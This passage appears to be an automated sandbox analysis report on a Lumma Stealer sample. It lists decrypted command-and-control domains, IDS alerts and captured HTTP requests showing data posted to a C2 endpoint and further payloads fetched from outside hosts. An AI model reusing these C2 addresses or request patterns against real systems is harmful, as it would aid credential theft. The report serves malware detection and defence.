              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: simplerapplau.click
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ZINA
              Source: MdhO83N5Fm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: MdhO83N5Fm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: MdhO83N5Fm.exe, 00000000.00000003.2259303619.000000000C2E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: MdhO83N5Fm.exe, 00000000.00000003.2259303619.000000000C2E0000.00000004.00001000.00020000.00000000.sdmp

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058428 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (simplerapplau .click) : 192.168.2.5:55106 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49742 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49730 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49736 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49753 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49759 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49782 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49765 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2058429 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI) : 192.168.2.5:49776 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49782 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49730 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49730 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49736 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49753 -> 172.67.152.160:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: simplerapplau.click
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49730 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49753 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49765 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49796 -> 172.67.208.58:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49776 -> 172.67.152.160:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49788 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.5:49796
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I0TSYDJPODGS26X2PZTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8F5H32CW93AYV919H6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15076Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0884LFAMPTZEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20530Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6I7I4SSZ7PYZO9GYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZR4JU6HBP6VSK8SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1113Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: simplerapplau.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: simplerapplau.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://169.254.169.254/latesthttp://
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://169.254.170.2if/with
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.0
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.1
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.2
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://hu.utf8hybull;hyphen;h
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schema.org/extensionshttps://%s/%s/%s
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
              Source: MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
              Source: MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
              Source: MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.2
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.3/exr
              Source: MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/kml/2.2
              Source: MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.topografix.com/GPX/1/1
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://%s.amazonaws.com/%s/%sifSourceMetagenerationNotMatchillegal
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://%s.amazonaws.com/%sifSourceMetagenerationMatchif_metageneration_not_matchignoring
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/authidentitystore.us-gov-east-1.amazonaws.comidentitystore.us-g
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.bitbucket.org/2.0/repositorieshttps://storage.googleapis.com/storage/v1/impersonate:
              Source: BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: BitLockerToGo.exe, 00000003.00000003.2578908609.0000000000534000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617473616.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtk
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developers.google.com/accounts/docs/application-default-credentialspkcs7:
              Source: BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.ntfy.sh/publish/#action-buttons
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.ntfy.sh/publish/#scheduled-delivery
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/Finb/Bark/tree/master/Sounds
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwordshttp2:
              Source: BitLockerToGo.exe, 00000003.00000003.2621648439.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2627323054.0000000004EBE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2630978300.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626970933.0000000004DB3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2632990045.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625095714.0000000004EB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2636022656.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626727023.0000000004FCE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625664418.0000000004EB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624416779.0000000004F9B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2632343356.0000000004ED8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2636187778.000000000504A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2622417689.0000000004DB3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2628042716.0000000004DBC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625776085.0000000004DB7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626281030.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2620043420.0000000004F2A000.00000004.00000800.00020000.00000000.sdmp, 